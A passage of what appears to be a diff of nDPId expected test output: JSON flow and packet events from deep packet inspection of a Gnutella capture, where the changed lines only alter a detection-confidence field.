+00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95893,"flow_last_seen":251793,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1751,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":139889,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95716,"flow_last_seen":139781,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95893,"flow_last_seen":123936,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":146329,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95716,"flow_last_seen":243760,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287308,"flow_last_seen":287308,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":287308,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.210.81.59","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":287308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":287308,"pkt":"UlQAEjUCCAAn5uVZCABFAABpuTwAAIARzSsKAAIPVtJRO3AJGMoAVf5iR05EED+uAQFMQVEyUApVRFBdL+I1CXBbSWKeSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4201,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287308,"flow_last_seen":287308,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":287308,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.247.89.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -2638,7 +2638,7 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4664,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":288355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":288355,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ptwAAIAR2SwKAAIPpIQKGXAJvHoAJCauo68xAuqK3ib\/VZWObCGFAwABAAUAAADDglFLQA=="} 00529{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":288409,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":288409,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":288409,"pkt":"CAAn5uVZUlQAEjUCCABFwABUC3cAAH8BdMakhAoZCgACDwMDt94AAAAARQAAOKbcAAB\/EdosCgACD6SEChlwCbx6ACQmrqOvMQLqit4m\/1WVjmwhhQMAAQAFAAAAw4JRS0A="} -00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":288409,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.020679} +00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4666,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":288409,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.020679} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4671,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":2,"flow_last_seen":288490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"thread_ts_msec":288490,"pkt":"CAAn5uVZUlQAEjUCCABFAAFWC3sAAEARmwMk76IbCgACDx8ycAkBQkS1R05EAVjxAQF4nOspZwx09GAJCT7CpZrkwOGi8n6RtJH8bgYgs0hiW9ONsGMg5p3WqpuLoo8zgBVcnfQtZB+Iedtdp9LOYjtYQWfW2kzdvWBtapxB8+MOg5haScUNi6J3gJi3lqi\/LA88AdYWyh36SPMAiLl+mzr3RiMwU+Wl1qUOUbCCO23Lg\/aI7Qcxq8\/WpXmKHAWr3Trni72CMtgENwPxNnk1ELP8O9ujj6rqYCZf\/9tF0Qxg5rfJHncEwQps72h+nCrGBHYOk53MZwkFEHP75qiCGjVtsAKHjaaLovnBTlef5fpAiBHEPDXd3vqErCCIybgwIOiCojzEkcz3DYyACtiCIaJABiSYgIw7\/UoP0\/2ADIhDgAyI9zxYghx1GBkYGGL1H5kaMjGkSB359NKPs4AfAD6Dfz4="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4683,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":289961,"flow_last_seen":289961,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":289961,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4683,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":289961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":289961,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4bogAAIARxeoKAAIPe81+ZnAJFEkAJPn9btcxAoLvbJD\/ZQI2cb+qAwABAAUAAADDglFLQA=="} @@ -2648,7 +2648,7 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4701,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":291154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":291154,"pkt":"CAAn5uVZUlQAEjUCCABFAABKC5AAAEARIKNJWfkICgACD8XZcAkANp0565kxAgUhZoj\/+H2oSNwcAwEBABcAAADZxUlZ+Qi8AAAAAAAgAMOCUUtE05ynKA=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4702,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":3,"flow_last_seen":291154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":291154,"pkt":"UlQAEjUCCAAn5uVZCABFAABUghEAAIARahcKAAIPSVn5CHAJxdkAQIPAXS\/iNTECAGQaxPLpTglwD4ABACEAAAD5AHBpbmtmbG95ZADDAlFLRNOcpygDU0NQQAFaQIJQUkA="} 00567{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4821,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":115369,"flow_last_seen":287650,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":302977,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4821,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":302977,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4821,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":116628,"flow_last_seen":287381,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3123,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":302977,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":311749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":311749,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0tpYAAIARiEUKAAIP1XgaVnAJdPoAIL2TR05EED\/KAQFUC1FLUlAGUk5BXS\/iNQlw"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":311750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":311750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0dUEAAIARISUKAAIPsKPnoHAJGMoAIHFJR05EED\/PAQFUC1FLUlAGUk5BXS\/iNQlw"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":311750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":311750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SbsAAIARjAIKAAIPdqbiRnAJGMoAILCeR05EED\/RAQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -2674,20 +2674,20 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":312957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":312957,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05pQAAIARsCAKAAIPTudJDnAJGMoAIHF1R05EED\/yAQFUC1FLUlAGUk5BXS\/iNQlw"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4960,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":312961,"flow_last_seen":312961,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":312961,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.84.140.96","src_port":28681,"dst_port":14400,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4960,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":312961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":312961,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0s80AAIARSSgKAAIPpVSMYHAJOEAAILg+R05EED\/zAQFUC1FLUlAGUk5BXS\/iNQlw"} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":124065,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":124065,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132833,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":1032,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132833,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":1032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132831,"flow_last_seen":132831,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.181.151.217","src_port":28681,"dst_port":25282,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132831,"flow_last_seen":132831,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.181.151.217","src_port":28681,"dst_port":25282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 